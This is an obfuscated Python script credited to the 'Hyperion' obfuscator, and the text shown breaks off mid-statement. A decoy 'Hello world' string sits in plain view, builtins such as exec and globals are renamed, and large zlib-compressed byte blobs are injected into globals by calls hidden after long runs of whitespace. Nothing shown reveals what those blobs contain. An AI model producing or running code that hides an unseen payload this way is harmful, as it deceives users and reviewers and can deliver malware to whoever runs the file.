from builtins import *
from math import prod as Builtins


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


Cube, Floor, Modulo, _ceil, _detectvar, Multiply, _stackoverflow = exec, str, tuple, map, ord, globals, type

class Walk:
    def __init__(self, _calculate):
        self.Add = Builtins((_calculate, -98469))
        self.Calculate(System=98922)

    def Calculate(self, System = int):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Add -= 60125 - System
        
        try:
            ({'5hhlbtt': _ceil} or _ceil if {'5hhlbtt': _ceil} and _ceil else ... or (_ceil, {'5hhlbtt': _ceil}))

        except TypeError:
            {Cube: _walk} if Modulo == _walk else (Floor, _detectvar, Floor) >= _ceil

        except:
            _stackoverflow(63555 / -33385) == int

    def _negative(self, _builtins = 65371):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _builtins -= 7301 / 80482
        self.Power != True
        
        try:
            ((_ceil, _ceil) or _walk if (_ceil, _ceil) and _walk else ... or (_walk, (_ceil, _ceil)))

        except AssertionError:
            (((_walk, _walk), _detectvar) for _detectvar in (_walk, _walk))

        except:
            _stackoverflow(89093 * 45355) == False

    def _product(Negative = str):
        return Multiply()[Negative]

    def _math(_absolute = 16966 / 49818, _invert = True, Random = Multiply):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Random()[_absolute] = _invert
        
        try:
            ({'5hhlbtt': _ceil} or _detectvar if {'5hhlbtt': _ceil} and _detectvar else ... or (_detectvar, {'5hhlbtt': _ceil}))

        except OSError:
            ((Cube, {Cube: _walk}) for Cube in (_walk, _walk) if _walk >= Floor)

        except:
            _stackoverflow(-45801 * -3244) == type

    def execute(code = str):
        return Cube(Floor(Modulo(_ceil(_detectvar, code))))

    @property
    def Power(self):
        self._theory = '<__main__.Power object at 0x000007516BE92163>'
        return (self._theory, Walk.Power)

if __name__ == '__main__':
    try:
        Walk.execute(code = __code__)
        _substract = Walk(_calculate = 25264 / 58658)

        _substract.Calculate(System = _substract.Add + 20554)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='nnnmmmmnnmnmnnmnm',_invert=b'x\x9c\xe5}[s\xdbH\xd3\xde\xbd\x7f\x85\xbf\xbd\xa1\xb4k\xfb\x05q$T\xa5\x9b\x94\x92\nU\xb2\x99\x8aR\xb1S\xfa\\*\x1ew\xa9\x85\x04G\x92\xd7\xda\xa4\x92\xdf\x9e\xe9\xd3\xcc\x00 H\x80\xc0Pt\x96\x12Ip8\x04\t`\xa6\xa7\x0fO?\xfd\xfc\xf8\xf7\xd9\x9b\xb7\xea\xb6^\x9d\xe03\xdcno\xf3\xd9\xea\xfb\xd3|\xfa\x9c?\xde\xde\xbe\xfd\xb7\xf3_\xfe\xf3\xdf\xdf\x96\x8f\xeb\xfc\xe1\x97\xb7\xf9\xa3\xd5m\xfa\xfd\xf9\x8f\xfc\xf1\t\xfb\x9c\xfc2[g\xd9\xdf\xcf\x7f,\x7f\xcf\xa7\xcfA\x14\xff\xf2\xee\x97\xff\x90}_\xfe\xd7\xe5\xe2\x97\xd3\xc2\xa7~_?\xff\xf1}F;\xfe\xe3\xf9\xf9\xdb\xd3\xd9\xbf\xfeEm\x1f\xe6\xf9\xfd\xbfJ\xbb\xf9W\xcdw/\xd6O\xf3\xfcqQ\xdc\r7~\xf8\xfd\xf7\x7f}\xcb\xa6\xbf\x7f_\x96>\x94\xad\xe7\xcb\x87\xa7%}\xe8?\xfe\x97\xab\xf7\xfe\x07\xaf\xd4e\x9e/\xe8\xfd\xc1\xb7\xc7\xf5\xc3\xf3\xc9/\xffy\x99e\xf9\xdb\x1f\xf9c\xb6\xf8\xb7_N\x07oN\xcftox\x7f\xf0\xf4\xe7z18}\xb3|\x99/\xbf=\xf3\xc9|\xf8\xf6]}\xf2\xbf\xe6O\xcb\xa7\xb7\xd3\xc7\xe5\xdb\xc7\xe5\xe2\xdf\x1f\xfe\xfb:\xcf\x96\xcf\xd40Sg\xe6\xdf\x1f\xfeG\xfe\x1d_M\xdf\xc2N\xfe\xfd\xe1S>\xcb\x17\x7f\xbf\xcd\xd6\x7f\xaa\xcf\xfd\x9d\x7f\xff\xe5\xf4\r\xfd\xa8\xf5\xfd\xb7\xfc\xf1\xf9\xf6V}\xdb\xdfO\x83\xd3\x0f\xcb\x97\xf5\xf3\xc9\xe9\x9b,\x9fO\xb3\xa7\x93\xd3\x9b\xc1\xe5\xd5\xd5\xf8r|yuy5V[pS\xdb\xe3\xcb\xcb\xab\xc1\xd7\xf3\xdf\xb3|\xa6\xba\xbd\xa9\xed\x03;\xc8\xd4m<\xce\xc6\xf8\x8c\x9bY6\xb89;\xfb\xed\xfdo\xefO\xde\x9f\xfc6<=\xfd\xaav\xb5|\x9e>??n\xdf\xd5\xa7O\x1f?\xc1\xed\xe3G\xf5\xaf\x1e\xf4cu\x7f\x8b\xf5\x8e}\xe5\x93\xc9\xe4B\xdd\xf3<\x87{~1\xb9PGD\xc7\xfdf\xc3\x9b\xf0\x99\x87{\xf5\x077\xf5x\x0f[\xf7\xea\xf1^}\xcc\x9c\xc7\xed_\n\xa7A\xce\x05=\xaa\x0fo\xde\xeb\xc9`\xf6}\x9d=\xaf\x1f\xe0\xaa\xfc5}\xac\xfdQ\xd7\xfe5\xde|\x9f\xff\xaf\xaf\xe1@\xe8L\xf3Y\xc7\x93\x9e\x9d\xd4}\xd3z=\x7f\x9a>\xacg\xe5\xd3x\xfa\xce>\xc9x\xd6\xe9\xfc\x7f\xfa\xd4~_\xa77}\xee\xec\xc3\xfaa\xb1|9\x19\xfc\xbdZg/\xcb?\x1e\xbeW\xba|=\xdd~-\xd4\xa9\x82s\xe5\xc3?m\xe2V\xeb\x93\xf7\xf4\xb0~\xce\xd6\xdf{9y\xb5\xfb\xda\xe7\xe4\xd5\xefLN\xde\xf2)\x9b\xfe\xa7M\'\xae:N\xf1\x8cY\x03\xcd\xe7\xc7\xeb}\xc6\xdbO|\xca\xb2\xe9_\xcb\xe6g\xec\x05o?~\xc0\xff\x8bz\xc4\x87\x1f\xeat\r\x06\x1f\xee\xf2\xf5\xc3\xf6\x11\xfa\xf9\xf3\x97\xcfx\xff\x02\x7f_`\xe3\x9ft\xa6\xf3\xbc\xfan\xed\x99\x86S\x87\xcbK&[$\\\xff)gk\xf9\xfd\xf1\xbf\xb5\x16\x81\xf8\x13>Y\xbf\x83\xfe>\xfd\x93\xce[\xb6\xfev\x9f\xcf7\x9d\xba\x9a\xf5v2\xf1r\x0f\xee\xeao\x92O<o\xf2\x0f:]\x8f\xcfO-N\x15-\xae\xd7\xa4\x98\x90\x9e\xf2\x0f:W\xcf\xd3<[\xb5\x9e\x93 \xe8\xbf\x80\xb8G\xe1\xffY\x9e\xbe|\xb6\xf7T\xbb\x12\x9f\x0cN\x87\xaa\x87\xd7\xb4s|\xeb\xdd\x8e\xd4}\xa8\xfe\x12u\x8fo\x13\xf5\x89\xa4\xda\xda\xf8\xdbo}\xf5\xd1\xe86\xb8\r\xd5\xc7\xe2\xdbH\xf5\xf7\xcbmN\x0e%U\xdf\x92\xe0\xb7\xe0w\xa8\x9f\x0f\xdf\xed\xa9\xd7\xa5\xd6f;\xdc\xa0V\x9f\xcc\x06\xc10Z\x05\xa9\xbaG\xea>R\xf7@\xddCu\xf7\xb8\xcd\x87v\x7f\xe6\x8f\xfcE\xa3\xbe\x89\x9f*\xfd~\xb1\x04\xe3\xf0d0Z=W\x15\xd9Sz\xa8\xdc\xff93i\xbe|i\xaetm\xbepQ\x10\xf8\x9b\xfe\xa2\xc0\xbc\x13\x05\xbb.\xc5\xd7\xf3\xb6\x03\xc6\xf7\xe3 \x9e\xc7Q<LT\xcf\x9d\x97\xbaV\xbb\xd1\xd7\x97\xaf6Y\xd2\xe3Nc\xd9\xf3\x174N\x9b\x8d\xc1\xf6\x07\xaf\xf6L\xdf\xe05\xf8\x86\x9aC\xbf\x1c+9yuyy\x89OW(0;\x1d\xb5\xccH\x98\x85\t\xdfC\x9e\x8d\xa1\xdcy\x067\xe9\x1b4={\x0f\xf9\xf3\xc9\x06\x95\xfe\xa4\xaaP\x9c\xd4\xd9\xa6\xa7\xb5\xa7\x89\x96X<J\x9fz7\x95\x9b\x01\xca\xe6DI\xc7\x10\x9f\x13\\\x02\xc2jk\xe7\xb3\x0egm\xc8g\xd3\xe3\xb3\x97\xb0\\$Yh\xce\xfa\xae\xbeqs\xb9\xb9\xc7\xa4M\x12\xf5e\xb1\x1f/\xe24\t\xfdd\xcf\xb1[#\x89\x92h\x84\xf7\x11?\x9b;\xfd\x8d\\H\xa1h\x16\xa6q\xe8{a\x10\x8f\xe6\xf1\xcc\x8b\x87\xbe7\x0fS\x0f\xb6\x97\xc3\xd9l\x1a\xc4\x01\xbc\xab\xb6\xa7S\xf5#\xd4\xf6h\x1eL\xe7\xf12\x1eE\x8b\xbd%W\xcd)\x18\x95\x0fYo%\xfa=~tq2\x82\xfd\x0fh\xf0I\xdbI\xb2\xc8\xc1v\xa7\xb9\x11\xf1\xb8\x0eXO\x90q/\xd2\'\xe5y\xb1\xab\xdf\xa8\xbb\x1c\x1f\x9cz\xed\xd4\xc7T\xc9\x89Xi^\x91z\x1e))\x11\xa0\xfaXi\xed\xe5\xfc\xd8\xcf\xa9%\x0f\xbc\r\xe7h[\xdf\x86\xe7\t\xef5\xa3\xe0\xe2\x02\r\x9d\x0b\xb2{.\xe0YY?\x93#_\x8e\xbd\xce\xcb\xf1\xe6\x1d\xc7S\xf5\x97*5\x07\xfed+\xe5V\xfa\xa3v|\xed`F\'\xc9L)Zi\xbcL<%BB5\xc3\xa7\xd0\x92(1\x17\'\xb1\x1a\x031\x08?\xd5\xaav\xb4\xaf4\x1f\xb0\tk\xfd\x1e^i\x1b/\xb50\xb7\x86\xdd\xcc\x8f\x16W\xb0\xc1\xf2\xd7\xca\xc4\xda\xb2\xb2\xdbw[O\xd2\xd2\xc9Z\xd9w\xf5\r\x1b\x1eZ\xdd\xcc\xccaj^\xa8\x7fuW\x0f0G\xa1\xe1\xa2\xb3\x08\x8aY\xf5HY\xfc\xfa\xdc\x96\xa0:b\xc4\xcf\xb6~Q_"\xba\xe10\xea\xe3\x02\x8b*f\x1fS\xc8\xe24\x95e\x88\x8f\x7fW_\x12\xd5]\xc5o\x03\xadbT\xd2$\x9c)V\xa0P\xa1\xd24LR\xa54M\xe3U\xec\xa3\x9a\xb5H@\xddZ\x82r\x95*\xa9\xa7\xb6C\xa5S.\xe3\xc4\xf7"T\xb3f\x8b\x8d*\xd8\x1c^\xa3\x026\xa7\xfd\xc2g\xa30\xf1\xd5\x9e\xf1\xd3a\x8c\xf24\xda_\x87\xc9q~\x80\xb3\x0e\xd7.\x980G\xbfx)\x19\xdfAvg\xd9]vww\x97\xad\xef\xee\xd6wk\xd5\xa8\x1e\x9b\x1bH`\x0c\r\x95R\x03\xbe0\x0f\x9cIh UZ\x0fy\x02\x1bH\t\xf5\xa3@?\x0b\xd5\xcf\x0b\xd0\x03\x17\xc2\x0e\xaa\xad\xcd\x95\xbd\x18\x9di!\x9b\x84\xde\xed\x08\x95\xbdJ\xab\x83\xe5\xb0eg\xf89\x81\xfa))^ \xb0p\xc1\xa6\x1dU[\x9b\x8f\x01\x0f\x8f\x13|\xa1p\n\xc9\xb9\x18V[{Ye\xe2\x92\xc1\x9b\xb0"\x8bJmi\xa5\xd9\xd6\xd7\xdf\xdf\xb9\xd8N\xff[(\xc9Dwx\\\xf2\xa3\xd9Z\xb8\xd0\xf9\xd4~\x87j\xff\x11XsJ\xb3\x1c& {#e\xb9+M\xcf\xf7\x92X\xbd;W\x12\x17\xdf\xef\xd9\x86gUWIoeU\xf3\xa3y\r\xcf\xf2\xda\xc9\x81\x87\xea`\xd5}\x7fq8\x1eC\xe8\xe1\x8a\x83\x10\xe4as\xe2\x94\x07\x19\x99\xa2\xb8!\xe9\x91\xe2\xbc\x89\xaa\xad\x87S\xa1\xf7\x10\xb4\xcd\x04\xae\x0f\x02\xf6\xbdZ\x13\x0e\xa7\x9a\r-5K\x04Bdy\x06\xd0WY\x8aFl\xeb\xdb\xe6\x9c\xd4\x0c\xad\x8f\x04\xd02!\x00\xb8u:\xc8\x84\x7f\xb4\xe8\xd2\xa2c\x86\xdc\x86\xceY>\xc8&}\x1b\xba\x0e\xf7\xb0\xaf\xe5t\x0e-9<\xb2d\xf3\xd0\x92\xdd\xdb\xfa\xf5m\x9f\x87a\xb8\x82\xbfx\x15\xd2M=\xc7\xabP\xfe\xd4v\x171\x05\xcbm\x8c\xbaP\xc0:\x80\x9a\xd5\xac\x19\x94Z\x0f:q[\x9d\xa1e\xb8\xc0\xbf%n-\xad-\xf3Z\xbd\xef\xde\x82\x88\xd9\x82Hf\x89\xb2\x0f\xfc\x91jSz\xbf\xaf\xde\x01\xefE\xef\xab\x98Y\xbb\xcc\x9f\xbd\x8a\xc9\n\xe7b\x1d\xeb\xb0,\x036\xea\x0b\x86R(\\\x0e\xb7\xa6bw\x84\n\xb0\x87\x8e\xc9\x04\x1d\x95\xa0\x1c\xa6\xd5V\'\xaa\xe9P\xcd\x85\x10c\xeb\x1e\xaa\xdfj\x1d\xc4\x10y\xa5\xf5\xd0~\xa2.\xe1\x92h\xd5\xb3\x82\x05\xc3\x0e\xff\xa6\xfc8\xd5\x8f\xf3\x10\x06\xe5\xdc\x89\x17Q-\x8a\xca\x06_\xc4\xb1\xd2#\xc3X\xcdK\xb5\x1d\xb2N\xd9\xf3\x01\xaeH\x00\x07^\xac\xee\x81G\xe2\x19^\xc5\xf8\x1c\xe2]\xfaP/\'\xbadQq\xde{>\xfe@\x90\xa3<\xbe\xfcxi>\x1b=4\xcbB\x0c\x16\x00Lc\x84\xb3\xb1\xd2z8\xadjO\rq/\x11\x18\xef\x7f\xca/\xc8}s\x01>\xce<\x9f\\ \xec*w\xa2\xc6\xb7\x92p\x84)\x1a\xe2\x15$\x14Q\xac1E\x85\xd6\xc3]QQ\xfft\xf482(\x9c\xd4R\x1fw\xf5k\x11u\xee:2P\xca\xcd\xc2(\n\xd4s\xa4n~\x18\xf5m\xc5\xa2BH\x12\x07\x94\xc2\x98\xe4M\xa8\xdb\xb4\x9a\xe8J\xd8&J\x00\xc1c\xb4R\xe26\x05c\x1e\xa4\x10\x98\xf5\x89\x97\x04\xfbO\r\x12B\x88\xba~!\xcc5>5\x14J[\xec\x90\x80\xb5\xf6H\xfc\xfeb8\x89/\xdc\xb2Cv\xf5m\xb86\xef%\xd5\r\xe6h\xefsxE\xc8\x1bu\xbf\x04\xc0"\xfc\x8f/\xaf\x9a{\xe0\x868\xcd\xc1\xc78D#\x7f\x84\x1e\xb8Jkg\x87\x99D\xc2\xe5\xb4\xa6\x91\xc1\xe8\xc4VhbW\xdf\xa8]h\xe2\xd0\xb8\x03p\xd9c`\x0b\x02\xce\x10\xd8\x9a@\xc6\xd2\x01u\xc4\xbd\x967/\x9aw\x18\x83\xb5\xde\xc6\x85\xf1,\x16\xfel/\xa4nq!\xbc\x82\xfd\x9do\x9bw\x99\x8c\xd4_\x82\xf7Do\xd9\xafF\xf6\x96\x8bC\xeau\xc1\x19L\x00\xd2\xe6\xe5\xea?\xc78\x13n*}\xa5\x9dZH\xa6P\x88\xf7D\xab\x85\x85\xd6c\n\xa7o\xf1TC\xec\xae\xef\xf5[\xd6j^\xa7\xc5\xa5S\xb89\xc1\x92\xa5\xfb\x8b1N\x85B\x13\x81\x17\xe8c\x8f;\xaa\t1\x0c;\x98Fc\\Iq\x19\xbd\x1c\x8f\xf9\xbf\xe1B\xba\xc5\xefk\xab\x18\xb1\xe8\xa7\xe2\xe2,\xf9}w\xf5ux\xf6:X8[$\xa5HB\x92\x90\xc5\x9b\x91\x97\x89\x1bIY\x08')

        if 355527 > 3258871:
            Walk(_calculate = 14669 - -90415).Calculate(System = _substract.Add / 13452)
        elif 199437 < 1985938:
            Walk(_calculate = 55725 + -87990).Calculate(System = _substract.Add + -64788)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='lIllIlIlllIIllllll',_invert=b'<\xc5\xb1R\x1e\xe20\t\x95>\x0b\x1e-\xb7\x81\'r\x18\x90\xaan\x1c\x08\xe2\xdd\x15WB\xcc\xad\xb0\xdd\xff\th5\xe7\xea\x96\x07@\x1c\xc0\x82\x80\xc0g\xcfS\xaf!\x91\xaa\xabz\xeeE\x06r"\x0e\xf5\xa1\x15\x12\xb0\xc3\x04\xbb\xfa:\x0b\x13\xa8\x01\x04\xe8\xb8Y\x87\xf5`\xe0MxU\x9d\xf0\xc9k\x8e>ti\xfa\x87\x18\xd2S\xab2\x87\xf7\x124\xfd\xa3j\xebqF\xf0\\\x9d\x98-R\\2\x0bd\xd4\t\xf6\xdd\x13K\xc5\x92\xe2\xbb\xfa\xb6q\xf6\xd6\xe1d\xc6:\xb5\x84\xee\xd4\xe3\xd8\x97h\x87\xbe\x84\xdaE\xc8,2f1\x92\xd7\xf8\xe7(V\x04r~\xa6\x0e\x10\x10b!>\x0f\xf7W\xc7\xae\xe9\x9b\xf9\xab\xd5\xab\xc6X\xd6\x1e\x82\xd7}cY[@\xd7\x9d\x86\x18\x07(\x95aA\x9b\xa0p\x06I\xdd\\:\x83{\x94\xf2%)|:B\xcfITm\xed\xbcZ\x8a\xd7C\xf2\t|\x96/\xb22\x06\xd6j\xb9\xabo\x0b\xa8Q\x8f\xf9\x07)\xae(\x1ef~\xc2c\x8a\x187\x0f\xa1XC\xbb\xb59\xce+B\xf7T\xc4f\xe6\x10\xa3sa\xb5\xb5\xd3\xc9\x0f,o`\x1c\x15\x11\n\xe2\x96\x12\xc1\xdf\xa4o\xdb(_koK\xd1\xe3\xb2\xd4\x9e\x17|u\x94\x10\xa7\x9a\x83\xb1\x7f\xfa\xb2ph\x8b\xc2A9:\xac.\xe1\x1eL\xff\x1c\xf3\xd2<n\x9e\xfc)\x19~)z\\=\x94\x1d\x04`\xad\xb4:Q #5e(\xf3{\x88\xdfF\x9e\x9c\xb8\xdaz8\xc5\xcb6\x7f%\xb4#\x88\xf5!\x0b9\xdfJY\xd8\xd5w\x0fEtO\x84Q`I\x00\xf9\x15"\x15\xca\xe9b\xcd\xfa\xeem\xc2\x89+\x03\xb0\x84\x97\xfcxu\xe4\t\xc9JS\x8cHW\xec;\xa93\x90\x14rI*\x87-z.\xa6\x9e\xc3\xeb#\xcbi\xac\xf5.Z\xf1@\xb3-\xa8\x04\r\'[5\xf75f\xd3\xfb\xd9b\xfa\x16\xbe\xeb\xda\xe8\x9c\xa4x\xc2\xcb\xb3M\xbf\xaff\xfc\xad\xef\xee\xee\xd6\xeav\x97\xdde\x0c\xef_gk\xb5q\xecC\xd0\xd1\xda\xc6`5\x03[\xdb\x04i[X\xad\x9d\x02#\x00w\xa58^\x80\xb6=\x02}\x11\xc8Ti=\x06\x8d\x1c\xa9&\x90u\xe2\x9e\x9e\x1e\x8e|\x94\xf8!b\x02g+\xca"\x8aGq\n9B\xa3$^\xf8^\x14c\xbe\x10X\x80\t\xe4\x05)\xa1\xe6\xf9^\x07;p\x87\x04`<R\xccw\xc1&\xd1\x96i\xef\x06#\xad\xd5\x99:\xc4\xb0\xd7\x90\xf2\x03\x7f\xf8\xa0^d\x98\xfd\xd3&\x085B\\\x9e\x8ff\x84RT8\x08Ujm\x0e\xfe\x83\xee\x11\x03\x0ca\x8b\xf8q*\xad?\r~\xa9\xef\x85\xb4\x10\xfb41\xd0\xc4r\xadX\xaf\\\xc6A\xc3D=\x0f\x1d\xc0n\xacC\xda\x14\xc00\x9e$\'\x87\xd7\xfb\x15\xb3C\xedV\xd2O\xc1\xaaj\xa3\x19\\\xd3\xd7\xf0\x03~Q\x1b\xb5\x00U\x01\x9c\xedk\xd4\x0e0\xdb\x0fT\x84\xce\x16C`\xe9\xcfB-`S\x94\x8c,\x8baW\xdf\x86\xb4O\xdbW\xe0\xf8Vr\xfc@v\x00\xa2&B\xcb\xaa\xd2\xda\x06\xb4\x13\xa2\x83\x1e\x9d\xf4\xe0\xeb`\xd0N\xa9\xb5\xd3\xb9\x14\xf2\x1c\xc9\x93\x16\xdbD\x08u<\xcb\xf5\xd4\xa4o\x9b,\xb7\xd6YmeD\x89=\xd8\x9b\x0fk\xe0/\x02\xca7\n\x05C\x18\xf8l#e^\x1d\xe7\xc8\xc7OB\xd0\xf8\x91\xf3k\x8e\x1d\xf9\xd3\t\xf73\xa0\xe8\x03\xf9:\xc4\xdd\xa1^;\xf1O\xb8\x8b\x86uw\x91\x8f\xa2"l\xd06\xe3E\x94\x88\xb9\xdf\xa4o\x1b\xe6\x93n\x9a\x81\x8f\x99\xef\xa0\xbf\x82\x96\xeas&\xfbRm\xcfX\x93\rP\x93\x85\xbc\xf6\xa1jM\xc3\xd0\xca\x9e\x9fc\xd6|\x82Y\xf3\x8by0\xf5X\xe7\x9dNg\xb0\x8f(\xe4\x8c\x99\x08s\xee\xe7\xd0\x83\xf6\x16#i\x91\xb4a\x84d\xa5\xda\x938\x82\xfdF\xcaH\x8d\x02\x07Zrh\xe1\xf4\xe3UQo\x8e\xf9\xd1\x19\x92\xb6\x13\xac\xf0\x9e\xe8\xf8\x88\x97\x8fl#\'s\xc1C6\xa0\x00\xf9\x80`\x85\xa2\\\xf4R\xdb\x01C\xafn\xf2c z\x03\t>\x11\xc6\xba\x03\xc4\xa9\x11\x9bZ\xa5\xf5\x18\xac\xe2\x8fB\xfe\xfb\x89\x19\xad\x9aC\xfcMjF\x84V\xbe\xff\x1e \xfe\x95V7c\xc9Q\xe7-B8d\x1dN\xf4\x0e\xd1ED/\x89-!\xbc\xaboC\x0e\x98~\x840\x0b\xca\x058\x08\xa2\x10C\xc7\x11\x89P\x10\x85\x1dR\n\x07?L\xba\x0f\xa3\xf9\x8e\x1d\xc9\x87\x99\x96\xf3`6\xf5\xbdy\x90v\x10\x9a\xa8\xcd\x81\xb7\x1b=\xdf\xa0\xdcu:\xf2P\xc2x\x91\xa1r\x90A#\xc49\xbe\x95\xa1\xb2\xabo\xe33\xb8\x89\x8d\xf2\xe4\xff\xc2\x0f\xbe&\x8f,o\x92\xbb\xf64\x7f<9\xd9\xc8\xb3~:}X\xec\xc1Y\ta\xf2\\\xd8/!T\xae\x1e\x1a\x87\xc9[\xe2\x92|\x8c4\x81\\\xf2\x91\x078\xc0\x98z\xa5\xb5sL]b\xe2B\xf8$\x06\xa0\xce2\xb0b\xea\xbb\xfa6e\xc2\xea\x82L^\xec\xaf\xa4\x93\xd6@L\xbe\xbc\xd1By@\xfcv\x80<4\x14\x01\x8cP#\xa8\xb4\x1e\xa9f\xee\x08\x83V{\x9d\xba"\xc8\x07\xec\xff\xbeg%\xaf\xf9\x95\xa2L\x9e\x04i:BD[\xa4\xef%\x93\xa7\xd0z\xe8\xf3yT\xe1?\t\xf7\x99 \xa0\xcd/m\xc2\x83\xd2\xef\xc8\xec\x80:\xd3&\xde\xe0\xea7[\xe6\xd1I\x82 \xb37\xf6\x9eZn\xb8\r\x84\xed\xa0\xcc\xda\xe3\x8c\xb9\xa7\x88\x16w\x903?\x0f\xa7\xe1\\g\xcf\xcf\xed\x8cy\xca\xa6w\xe22\x9f\xa1^\x15\x12?]\x12"q\xf0\x02\xb6l;=A[\x1f\xfb\xec-\xc5 \x82\x93\xb1Ow\xbd\xce0\xb8\x83\x94n\xcd\x11cC\xac\x07\x10#\x13\x18\xda+\x88\x18\xf3\xcb\xad\xed\x0c\xdb!\xbaZ\xa9\xc8A\xa0M\xdbBk\xf3\x1d&\xf8\xd1\x98)!\x08\xff7\xac\xb6\x1e\xd6\x02\x92\xd4\x11a\xd1\x11\xf7\x92\x00\x90=\xcb\x02\xaa\xeb\xab\xd3.\x0f\x97F\x1d/:\xcd\xb4\x012\xfc\x02\x89h\xceL\xbfn\x12\xec\x01\xa8\x98\xe0\xd0\x1b\xe2\x82J\x06\xf5\xa8\xda\xfa\xd3\xbbHjeH\x10\xae\x10\x98\x10\x85\xcb\xc8\x05\xdb\x86\xc4\xad\x89k\x83\x1e\x85u\x83\x9e\x1d\xa6\xca\xf4\xce\xe84ef\x14\x96\xea(\xf5\xa7\xfcj\x8a["\xfb\xa7N\xb8R\x9a\xe2\x13\x88P\x9e|\xbdh{\x03\xc7i\x17\xc4\xfa\x1a\xa1>\x1c\xc8\x07\xf0Os\xc9\x1f\xde\x0e9k4"\xf6K\x94\xfcQ\xb9\xb5\xb9\x13,\xbd%9O<v\x9e&?/\xb5\xfe4\xc1|\'\xd9\xdaZ\xc5\x92?\xa3h\x19z)\xa7jW\x1f%XjC\xf9\xc5\x10\xfe\xa8\xb0\xe5&\t\x04\xb2]\x80\xce\xdcAY\x8a"k\xb2\xcd\xa4\xcc[\xdd cT\x14\x80*J\xc5h>\x12\xd7O\xa5\xb5\xb3\x1bF\\cR\xbcE4\x12\xe1\xe3\xf0-7\xcc\xae\xbe.\xf8\xe6*\xe0s\x1bUo\xb1\xa7:O_=,o\xaa\x01\xc4\x16-f\xb2\x90\x8d\xdd|\x9cI\xab@\x92Ml\xd9H\xc6\xe1*\xe1\x12\xed\x10J7I\t\x13\x86\xfa\x7f\xa5\xf5gYV\x0e\x92.= \xda\x7f\xe0F\x81\x87\x8b\xe3\xa73w \xc3Q\xeb\x9bk\xb6\xbcy\xc1\x1b0\x17\x1d\xf1(\xf3u\x06\x88\xe3\xbe\xcb\x08\xd0\xbd^\x93\x8e\xd7\xd0\xac\xaf\xb9\x886\x83\xd7\xc82Am\xc6\xdb\xc8\x02\x1a\xed\xea\xdb\xd0\x1f\xbfk\rLP?\xa4\xc2\x84\xe0\xec\x8e\xd0\xd2\x0b\x10Mj\xb5\x1e\x1ee"\xcc\xc0\x12\x83\x908\x13\xc6&J(\x93m}\xbb\xe7!\xd7,\x9aPPf\xae\x8b\xca\xcc\xf9Q\x8a\xcd\xcc\xf9\xd5\xd4\x89\xce\x15&>\x08\xa9\x0e\xf9[T\xc2\x0e\xea\xd7A\xd0\x90h\xb7\xbb\xe5\xcb\xb8\xc7q\xf9\xf1(\x01a\xed%\x10+^\xf9+e\xc8-c\x10\xd9@\x95\xe9S2\xb2j\x81\xb4\xe4\x85z\xbfS\x85C\x86y\x8d\xa9\xf9\xd8\xe5w\xef\xca\x91\xa4eX\t\x1c\xc5\x84\x8e\x85#\x06\xe2\xfe\x0fE\x1b\x0c\xa3\x92!a\x97ycS\xc3\xc9rd\xa7\xc9\xf7\x8c\xde.\x92q%\x154\xf7\xc8\x1dEWg\xde\x90\x1a\xb9Z6C\xec\\X\r{u\xa0\x93\xdb(\x19\x9b\x13\xdd\xa6\xe4\xdc\xd6\xa7\tEKm\x19?\xaaJ\xcb\x10(F\xd8\x1eV\x1a\xbf.\xfc\xa2\xceB\xb3\xe3\x98&}qsb\xe3\xcf\x11\xc5\x14\xd9\xb9\xd4\xe9pK+)nQ\xe6z\xef\xe6\xe3\x88\x08!\xcf5\x81\x10/\xff\x1e@\xf9\x95\xd6Nc\xcd\xce\xed\x15\xb0\xaf\xcd\x10\xe0m\xc8\x01.\xf7kS\x8b\xab\xa5\xc7/\xe5*\x80\xa4\x96\xcdQq\x9brE\xc0\xa9V\xe3\xb8j\xa0#\x17\x191y#\x87\xb7R\xdcz\xcf\xb6\x14j\xf2T\x07X\xe5\xf5\xb4\xe0\x82w\xa1\x8d\xfa\xbd;2\xc5\xfdRt\xc3\xd8\x13\xdf\x8d[\x06\xa8\xe3\xa3UgT\xc6 \xcfs\x84\x8f\xe5\x1e\x165\x9bx\xf4\xdf\xd8G\xf3j\nv\x12\xcc:U\xa4\x141\x7f\xcd_\x04\x0f\xcd=M\x01\xba\\S\xe6\xe3M\x18\x95]i\xed\x8cn\x94BUR\xa0J\xb6u\x8a\x94\x85n\xdc\xd5\xb7\'\xa6\x99\x03\x07\xecl\xccI\x11gbW\xda\xb0\xdf9\xd2@\xc8\x00b\xe0\x13\xf2\xb1]\x10\xb9k\xc3\x90\xb8{S\x8d\x864\xd3#1\xe0>\xe0!]j}mXa\xeb:Z\x92X\x1fa\xce\xb1\xcfu\xb4*\xadN\x8ek\xc4UI\xc0C\x15b]\x06\xa9\xd1Pj}-H\xe5\xde\xecF%\xe2\\&\xc4/\x90\xe1;\xc1\xb6u\x90\xfa5\xf2Ex:\xc2\xb0\xf4\xf3\xe3\x95M\x10\xea\xe6p\xfc\x15y\x80\x12/^\xf1R\xae^\xc5\xbe\x924\x10\xab\x0c\xfcU\xb0R\xdbq\xb0?\xdc\xb8\xd6\xe3=\xd5H\x07Q\xc5\xa6\x96\x1a\xe6\xacV\x8c\xea0g\x81\x9aBJE\xa2\xd6.u\x02\xa0n\xcc\x10\t\x08W\xf1\xd2\xae;\xad\x86\xb5\x9f,\xe03\xea\x94\x04\x10\xf3\x80\n\xae\xc14\x18&\x1d0\xd8l>R5$\xb4 \xb9\x1c\xd2\xb1\x88d\xa7\x1e\x9a\xc15\x7f\x8d\xe8@\xf8\xa2\xd3\xa1G\x91\xc9\xa7\x90\xc2\xc5\xe2\x820\xe5\xd9\x8ckb[_\xbf\xb9\x81\xb5\xf7)\x04\xe7\x0c\x8e\xbe\x0e\x91\x97\x0c3\xe5\xd7\x986')

        if 172350 > 6939336:
            _substract._negative(_builtins = -2852 / _substract.Add)
        elif 150960 < 5244641:
